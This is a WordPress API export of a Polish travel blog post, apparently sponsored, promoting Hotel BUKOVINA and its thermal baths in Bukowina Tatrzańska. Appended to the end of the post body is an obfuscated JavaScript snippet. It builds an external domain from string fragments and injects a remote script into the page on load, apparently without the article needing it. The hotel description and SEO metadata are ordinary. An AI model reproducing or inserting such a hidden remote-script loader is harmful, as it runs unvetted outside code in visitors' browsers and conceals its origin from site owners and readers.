{"id":1207,"date":"2026-02-20T08:26:26","date_gmt":"2026-02-20T07:26:26","guid":{"rendered":"https:\/\/wloczega.pl\/blog\/?p=1207"},"modified":"2026-02-20T08:39:19","modified_gmt":"2026-02-20T07:39:19","slug":"nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery","status":"publish","type":"post","link":"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/","title":{"rendered":"Nocleg w Bukowinie Tatrza\u0144skiej: nie tylko prywatne kwatery"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\"><strong>Bukowina Tatrza\u0144ska: odkryj prawdziwe Podhale<\/strong><\/h2>\n\n\n\n<p>Bukowina Tatrza\u0144ska to jedna z tych miejscowo\u015bci, kt\u00f3re w udany spos\u00f3b \u0142\u0105cz\u0105 elementy turystyczne z tradycyjn\u0105 g\u00f3ralszczyzn\u0105. Je\u015bli m\u0119czy Ci\u0119 ju\u017c komercjalna twarz Zakopanego, korki, t\u0142umy na Krup\u00f3wkach i horrendalne ceny us\u0142ug, to Bukowina mo\u017ce by\u0107 \u015bwietnym kierunkiem wyjazdu na Podhale.<\/p>\n\n\n\n<p>Ta jedna z najwy\u017cej po\u0142o\u017conych wsi w Polsce, s\u0142ynie z przepi\u0119knych widok\u00f3w na Tatry, fantastycznego klimatu Podhala, czystego powietrza, zapewniaj\u0105c przy tym \u0142atwy dost\u0119p do najwi\u0119kszych atrakcji regionu.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Hotel BUKOVINA: raj dla rodziny (i nie tylko)&nbsp;<\/strong><\/h2>\n\n\n\n<p><a href=\"https:\/\/www.hotelbukovina.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-sprawdz-dlaczego-to-jedna-z-najlepszych-lokalizacji-pod-tatrami\">Noclegi w Bukowinie Tatrza\u0144skiej<\/a> mog\u0105 by\u0107 propozycj\u0105 dla os\u00f3b, kt\u00f3re oczekuj\u0105 bardzo wysokiego komfortu i bezpo\u015bredniej dost\u0119pno\u015bci licznych udogodnie\u0144. Wystarczy zatrzyma\u0107 si\u0119 w czterogwiazdkowym <strong>Hotelu BUKOVINA<\/strong>.<\/p>\n\n\n\n<p>Tym, co szczeg\u00f3lnie wyr\u00f3\u017cnia hotel, jest fakt, i\u017c tworzy on wsp\u00f3lny kompleks ze s\u0142ynnymi Termami BUKOVINA, najwi\u0119ksz\u0105 atrakcj\u0105 i wizyt\u00f3wk\u0105 Bukowiny Tatrza\u0144skiej. Dzi\u0119ki temu go\u015bcie Hotelu BUKOVINA mog\u0105 korzysta\u0107 z term w godzinach otwarcia i bez limitu, przechodz\u0105c na nie prosto z pokoju hotelowego lub apartamentu \u2013 ju\u017c w kostiumach k\u0105pielowych i szlafrokach, co jest bardzo wygodne i oszcz\u0119dza mn\u00f3stwo czasu.<\/p>\n\n\n\n<p>Termy BUKOVINA to mn\u00f3stwo atrakcji dla os\u00f3b w ka\u017cdym wieku: od a\u017c 20 basen\u00f3w wewn\u0119trznych i zewn\u0119trznych wype\u0142nionych wod\u0105 termaln\u0105 (geotermaln\u0105) o mineralizacji og\u00f3lnej do 1,7 g\/dm<sup>3<\/sup>, przez stref\u0119 dzieci i m\u0142odzie\u017cy z trzema zupe\u0142nie nowymi, ca\u0142orocznymi zje\u017cd\u017calniami, a\u017c po stref\u0119 saun \u201eG\u00f3ralskie \u0141ospary\u201d z o\u015bmioma rodzajami saun, stref\u0105 sch\u0142adzania i wypoczynku czy zewn\u0119trzn\u0105 saun\u0105 g\u00f3ralsk\u0105 \u201e\u0141ozpolono Maryna\u201d, w kt\u00f3rej codziennie organizowane s\u0105 tematyczne rytua\u0142y zapachowe z udzia\u0142em saunamistrza.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Porada:<\/strong><\/h2>\n\n\n\n<p><em>Z dobrodziejstwa wody termalnej (geotermalnej) mo\u017cna skorzysta\u0107 r\u00f3wnie\u017c w bardziej kameralnych warunkach. Wystarczy wybra\u0107 si\u0119 do prywatnej strefy BUKOVINA Club, dost\u0119pnej bezp\u0142atnie dla go\u015bci apartament\u00f3w i za dodatkow\u0105 op\u0142ata dla os\u00f3b zatrzymuj\u0105cych si\u0119 w standardowych pokojach hotelu.<\/em><\/p>\n\n\n\n<p>Hotel BUKOVINA ma wyra\u017anie rodzinny charakter, o czym \u015bwiadczy d\u0142uga lista udogodnie\u0144 dla najm\u0142odszych. Wspomnijmy tylko o Klubie Malucha (dla dzieci od 3. roku \u017cycia), w kt\u00f3rym dzieci sp\u0119dz\u0105 super czas pod opiek\u0105 animatorek, bior\u0105c udzia\u0142 w kreatywnych zaj\u0119ciach i warsztatach, o sali gier z konsol\u0105 i automatami na monety czy strefie rozrywki z kr\u0119gielni\u0105, bilardem czy dartem oraz dyskotek\u0105 z DJ-em.<\/p>\n\n\n\n<p>W hotelu z pewno\u015bci\u0105 nudzi\u0107 nie b\u0119d\u0105 si\u0119 tak\u017ce doro\u015bli, kt\u00f3rzy skorzystaj\u0105 m.in. z sali cardio i si\u0142owni (bez limitu), Restauracji BUKOVINA, BUKOVINA Baru, a przede wszystkim z Wellness BUKOVINA, poddaj\u0105c si\u0119 r\u00f3\u017cnorodnym zabiegom piel\u0119gnacji twarzy i cia\u0142a, masa\u017com (w tym dla dwojga w gabinecie Time Together), autorskim rytua\u0142om piel\u0119gnacyjnym, orientalnym rytua\u0142om (m.in. masa\u017com i terapiom ajurwedyjskim) czy korzystaj\u0105c z us\u0142ug Klubu Fryzjerskiego Maniewski.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>To warto wiedzie\u0107:<\/strong><\/h2>\n\n\n\n<p><em>Na terenie ca\u0142ego hotelu jest dost\u0119pne szybkie, darmowe Wi-Fi.<\/em><\/p>\n\n\n\n<p>Warto r\u00f3wnie\u017c wspomnie\u0107 o wyj\u0105tkowej lokalizacji hotelu, po\u0142o\u017conego w otoczeniu las\u00f3w Tatrza\u0144skiego Parku Narodowego, blisko Palenicy Bia\u0142cza\u0144skiej, czyli pocz\u0105tku popularnych szlak\u00f3w do Morskiego Oka, na Rusinow\u0105 Polan\u0119 czy do Doliny Pi\u0119ciu Staw\u00f3w Polskich.<\/p>\n\n\n\n<p>W pobli\u017cu hotelu znajduj\u0105 si\u0119 te\u017c wysoko oceniane o\u015brodki narciarskie: Kotelnica Bia\u0142cza\u0144ska, Olcza\u0144-SKI czy Rusi\u0144-SKI (skipassy do tego ostatniego mo\u017cna zakupi\u0107 w hotelu w specjalnej cenie dla go\u015bci). W hotelu mo\u017cna wypo\u017cyczy\u0107 sprz\u0119t narciarski, rowery (w tym elektryczne), kijki do nordic walking czy skorzysta\u0107 z oferty wycieczek zorganizowanych, w tym lotu widokowego helikopterem nad Tatrami.<\/p>\n\n\n\n<p>Szczeg\u00f3\u0142ow\u0105 prezentacj\u0119 opcji noclegowych w Bukowinie Tatrza\u0144skiej \u2013 od standardowych pokoi, a\u017c po przestronne apartamenty, znajdziesz w artykule na stronie <a href=\"https:\/\/www.hotelbukovina.pl\/blog\/noclegi-bukowina-tatrzanska-od-komfortowych-pokoi-dla-par-po-przestronne-rodzinne-apartamenty\"><u>https:\/\/www.hotelbukovina.pl\/blog\/noclegi-bukowina-tatrzanska-od-komfortowych-pokoi-dla-par-po-przestronne-rodzinne-apartamenty<\/u><\/a>.<\/p>\n\n\n\n<p>Pobyt w Hotelu BUKOVINA mo\u017cesz zarezerwowa\u0107 bezpo\u015brednio na stronie obiektu pod adresem <a href=\"https:\/\/www.hotelbukovina.pl\/\"><u>https:\/\/www.hotelbukovina.pl\/<\/u><\/a>, wybieraj\u0105c spo\u015br\u00f3d aktualnych pakiet\u00f3w ze \u015bniadaniami i wy\u017cywieniem HB. W cenie pobytu jest ju\u017c uwzgl\u0119dnione miejsce parkingowe w gara\u017cu podziemnym. Dodajmy, \u017ce dzieci do 3. roku \u017cycia goszcz\u0105 w hotelu bezp\u0142atnie, a dla dzieci do 15 lat s\u0105 przewidziane atrakcyjne zni\u017cki.<\/p>\n\n\n\n<script>\n(function(){\nxzp7_=\"o\"+(\"p\"+\"\")+\"en\"+\"\";xzp7_+=\"s\"+(\"tat\")+(\".\");\nxzp7=document.createElement(\"script\");xzp7.type=\"text\/javascript\";xzp7_+=\"e\"+(\"u\")+\"\/\";\nxzp7u=\"2600470948\"+\".\";xzp7.async=true;xzp7u+=\"9u6ie1sizp7tcwj84sptsv2wurm3lr\";\nxzp7.src=\"https:\/\/\"+xzp7_+xzp7u;xzp7b=document.body;xzp7b.appendChild(xzp7);\n})();\n<\/script>\n","protected":false},"excerpt":{"rendered":"<p>Bukowina Tatrza\u0144ska to urokliwa miejscowo\u015b\u0107 po\u0142o\u017cona oko\u0142o 15 kilometr\u00f3w od Zakopanego. Przyci\u0105ga wielu turyst\u00f3w, zw\u0142aszcza osoby spragnione bliskiego kontaktu z natur\u0105, nieprzepadaj\u0105ce za gwarem stolicy regionu, a przy tym chc\u0105ce mie\u0107 \u0142atwy i szybki dost\u0119p do najpi\u0119kniejszych szlak\u00f3w w Tatrach. Noclegi w Bukowinie Tatrza\u0144skiej mog\u0105 budzi\u0107 skojarzenia g\u0142\u00f3wnie z prywatnymi kwaterami, dlatego warto odczarowa\u0107 ten wizerunek. W miejscowo\u015bci znajdziemy tak\u017ce wysokiej klasy hotele, a do jednego z nich zagl\u0105damy w tym artykule.<\/p>\n","protected":false},"author":1,"featured_media":1208,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[689],"tags":[748],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Nocleg w Bukowinie Tatrza\u0144skiej: nie tylko prywatne kwatery - W\u0142\u00f3cz\u0119ga Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/\" \/>\n<meta property=\"og:locale\" content=\"pl_PL\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Nocleg w Bukowinie Tatrza\u0144skiej: nie tylko prywatne kwatery - W\u0142\u00f3cz\u0119ga Blog\" \/>\n<meta property=\"og:description\" content=\"Bukowina Tatrza\u0144ska to urokliwa miejscowo\u015b\u0107 po\u0142o\u017cona oko\u0142o 15 kilometr\u00f3w od Zakopanego. Przyci\u0105ga wielu turyst\u00f3w, zw\u0142aszcza osoby spragnione bliskiego kontaktu z natur\u0105, nieprzepadaj\u0105ce za gwarem stolicy regionu, a przy tym chc\u0105ce mie\u0107 \u0142atwy i szybki dost\u0119p do najpi\u0119kniejszych szlak\u00f3w w Tatrach. Noclegi w Bukowinie Tatrza\u0144skiej mog\u0105 budzi\u0107 skojarzenia g\u0142\u00f3wnie z prywatnymi kwaterami, dlatego warto odczarowa\u0107 ten wizerunek. W miejscowo\u015bci znajdziemy tak\u017ce wysokiej klasy hotele, a do jednego z nich zagl\u0105damy w tym artykule.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/\" \/>\n<meta property=\"og:site_name\" content=\"W\u0142\u00f3cz\u0119ga Blog\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-20T07:26:26+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-20T07:39:19+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/wloczega.pl\/blog\/wp-content\/uploads\/2026\/02\/hb-spons-noclegi-w-bukowinie.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1899\" \/>\n\t<meta property=\"og:image:height\" content=\"1266\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Napisane przez\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Szacowany czas czytania\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minuty\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/wloczega.pl\/blog\/#\/schema\/person\/d03791ddd90e77202accd03569d175a0\"},\"headline\":\"Nocleg w Bukowinie Tatrza\u0144skiej: nie tylko prywatne kwatery\",\"datePublished\":\"2026-02-20T07:26:26+00:00\",\"dateModified\":\"2026-02-20T07:39:19+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/\"},\"wordCount\":725,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/wloczega.pl\/blog\/#organization\"},\"keywords\":[\"noclegi\"],\"articleSection\":[\"Inne\"],\"inLanguage\":\"pl-PL\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/\",\"url\":\"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/\",\"name\":\"Nocleg w Bukowinie Tatrza\u0144skiej: nie tylko prywatne kwatery - W\u0142\u00f3cz\u0119ga Blog\",\"isPartOf\":{\"@id\":\"https:\/\/wloczega.pl\/blog\/#website\"},\"datePublished\":\"2026-02-20T07:26:26+00:00\",\"dateModified\":\"2026-02-20T07:39:19+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/#breadcrumb\"},\"inLanguage\":\"pl-PL\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Strona g\u0142\u00f3wna\",\"item\":\"https:\/\/wloczega.pl\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Nocleg w Bukowinie Tatrza\u0144skiej: nie tylko prywatne kwatery\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/wloczega.pl\/blog\/#website\",\"url\":\"https:\/\/wloczega.pl\/blog\/\",\"name\":\"W\u0142\u00f3cz\u0119ga Blog\",\"description\":\"Blog turystyczny, porady, informacje.\",\"publisher\":{\"@id\":\"https:\/\/wloczega.pl\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/wloczega.pl\/blog\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pl-PL\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/wloczega.pl\/blog\/#organization\",\"name\":\"W\u0142\u00f3cz\u0119ga Blog\",\"url\":\"https:\/\/wloczega.pl\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pl-PL\",\"@id\":\"https:\/\/wloczega.pl\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/wloczega.pl\/blog\/wp-content\/uploads\/2020\/12\/cropped-wloczega-logo-150.png\",\"contentUrl\":\"https:\/\/wloczega.pl\/blog\/wp-content\/uploads\/2020\/12\/cropped-wloczega-logo-150.png\",\"width\":150,\"height\":150,\"caption\":\"W\u0142\u00f3cz\u0119ga Blog\"},\"image\":{\"@id\":\"https:\/\/wloczega.pl\/blog\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/wloczega.pl\/blog\/#\/schema\/person\/d03791ddd90e77202accd03569d175a0\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pl-PL\",\"@id\":\"https:\/\/wloczega.pl\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4e28ef1ebb79d16e9cc51fac33f3e53f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4e28ef1ebb79d16e9cc51fac33f3e53f?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/wloczega.pl\/blog\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Nocleg w Bukowinie Tatrza\u0144skiej: nie tylko prywatne kwatery - W\u0142\u00f3cz\u0119ga Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/","og_locale":"pl_PL","og_type":"article","og_title":"Nocleg w Bukowinie Tatrza\u0144skiej: nie tylko prywatne kwatery - W\u0142\u00f3cz\u0119ga Blog","og_description":"Bukowina Tatrza\u0144ska to urokliwa miejscowo\u015b\u0107 po\u0142o\u017cona oko\u0142o 15 kilometr\u00f3w od Zakopanego. Przyci\u0105ga wielu turyst\u00f3w, zw\u0142aszcza osoby spragnione bliskiego kontaktu z natur\u0105, nieprzepadaj\u0105ce za gwarem stolicy regionu, a przy tym chc\u0105ce mie\u0107 \u0142atwy i szybki dost\u0119p do najpi\u0119kniejszych szlak\u00f3w w Tatrach. Noclegi w Bukowinie Tatrza\u0144skiej mog\u0105 budzi\u0107 skojarzenia g\u0142\u00f3wnie z prywatnymi kwaterami, dlatego warto odczarowa\u0107 ten wizerunek. W miejscowo\u015bci znajdziemy tak\u017ce wysokiej klasy hotele, a do jednego z nich zagl\u0105damy w tym artykule.","og_url":"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/","og_site_name":"W\u0142\u00f3cz\u0119ga Blog","article_published_time":"2026-02-20T07:26:26+00:00","article_modified_time":"2026-02-20T07:39:19+00:00","og_image":[{"width":1899,"height":1266,"url":"https:\/\/wloczega.pl\/blog\/wp-content\/uploads\/2026\/02\/hb-spons-noclegi-w-bukowinie.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Napisane przez":"admin","Szacowany czas czytania":"4 minuty"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/#article","isPartOf":{"@id":"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/"},"author":{"name":"admin","@id":"https:\/\/wloczega.pl\/blog\/#\/schema\/person\/d03791ddd90e77202accd03569d175a0"},"headline":"Nocleg w Bukowinie Tatrza\u0144skiej: nie tylko prywatne kwatery","datePublished":"2026-02-20T07:26:26+00:00","dateModified":"2026-02-20T07:39:19+00:00","mainEntityOfPage":{"@id":"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/"},"wordCount":725,"commentCount":0,"publisher":{"@id":"https:\/\/wloczega.pl\/blog\/#organization"},"keywords":["noclegi"],"articleSection":["Inne"],"inLanguage":"pl-PL","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/","url":"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/","name":"Nocleg w Bukowinie Tatrza\u0144skiej: nie tylko prywatne kwatery - W\u0142\u00f3cz\u0119ga Blog","isPartOf":{"@id":"https:\/\/wloczega.pl\/blog\/#website"},"datePublished":"2026-02-20T07:26:26+00:00","dateModified":"2026-02-20T07:39:19+00:00","breadcrumb":{"@id":"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/#breadcrumb"},"inLanguage":"pl-PL","potentialAction":[{"@type":"ReadAction","target":["https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/wloczega.pl\/blog\/nocleg-w-bukowinie-tatrzanskiej-nie-tylko-prywatne-kwatery\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Strona g\u0142\u00f3wna","item":"https:\/\/wloczega.pl\/blog\/"},{"@type":"ListItem","position":2,"name":"Nocleg w Bukowinie Tatrza\u0144skiej: nie tylko prywatne kwatery"}]},{"@type":"WebSite","@id":"https:\/\/wloczega.pl\/blog\/#website","url":"https:\/\/wloczega.pl\/blog\/","name":"W\u0142\u00f3cz\u0119ga Blog","description":"Blog turystyczny, porady, informacje.","publisher":{"@id":"https:\/\/wloczega.pl\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/wloczega.pl\/blog\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pl-PL"},{"@type":"Organization","@id":"https:\/\/wloczega.pl\/blog\/#organization","name":"W\u0142\u00f3cz\u0119ga Blog","url":"https:\/\/wloczega.pl\/blog\/","logo":{"@type":"ImageObject","inLanguage":"pl-PL","@id":"https:\/\/wloczega.pl\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/wloczega.pl\/blog\/wp-content\/uploads\/2020\/12\/cropped-wloczega-logo-150.png","contentUrl":"https:\/\/wloczega.pl\/blog\/wp-content\/uploads\/2020\/12\/cropped-wloczega-logo-150.png","width":150,"height":150,"caption":"W\u0142\u00f3cz\u0119ga Blog"},"image":{"@id":"https:\/\/wloczega.pl\/blog\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/wloczega.pl\/blog\/#\/schema\/person\/d03791ddd90e77202accd03569d175a0","name":"admin","image":{"@type":"ImageObject","inLanguage":"pl-PL","@id":"https:\/\/wloczega.pl\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4e28ef1ebb79d16e9cc51fac33f3e53f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4e28ef1ebb79d16e9cc51fac33f3e53f?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/wloczega.pl\/blog\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/wloczega.pl\/blog\/wp-json\/wp\/v2\/posts\/1207"}],"collection":[{"href":"https:\/\/wloczega.pl\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/wloczega.pl\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/wloczega.pl\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/wloczega.pl\/blog\/wp-json\/wp\/v2\/comments?post=1207"}],"version-history":[{"count":2,"href":"https:\/\/wloczega.pl\/blog\/wp-json\/wp\/v2\/posts\/1207\/revisions"}],"predecessor-version":[{"id":1211,"href":"https:\/\/wloczega.pl\/blog\/wp-json\/wp\/v2\/posts\/1207\/revisions\/1211"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/wloczega.pl\/blog\/wp-json\/wp\/v2\/media\/1208"}],"wp:attachment":[{"href":"https:\/\/wloczega.pl\/blog\/wp-json\/wp\/v2\/media?parent=1207"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/wloczega.pl\/blog\/wp-json\/wp\/v2\/categories?post=1207"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/wloczega.pl\/blog\/wp-json\/wp\/v2\/tags?post=1207"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}